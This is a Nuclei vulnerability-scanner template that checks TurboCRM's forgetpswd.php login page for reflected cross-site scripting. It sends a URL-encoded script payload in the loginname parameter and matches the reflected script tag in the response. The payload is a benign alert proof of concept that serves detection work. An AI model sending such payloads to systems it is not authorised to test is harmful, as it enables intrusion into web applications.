nuclei-templates/vulnerabilities/other/turbocrm-xss.yaml

id: turbocrm-xss

info:
  name: TurboCRM XSS
  author: pikpikcu
  severity: medium
  reference: https://gist.github.com/pikpikcu/9689c5220abbe04d4927ffa660241b4a
  tags: xss,turbocrm

requests:
  - method: GET
    path:
      - '{{BaseURL}}/login/forgetpswd.php?loginsys=1&loginname=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E'

    matchers-condition: and
    matchers:

      - type: word
        words:
          - '"><script>alert(document.domain)</script>'
        part: body

      - type: word
        part: header
        words:
          - "text/html"

      - type: status
        status:
          - 200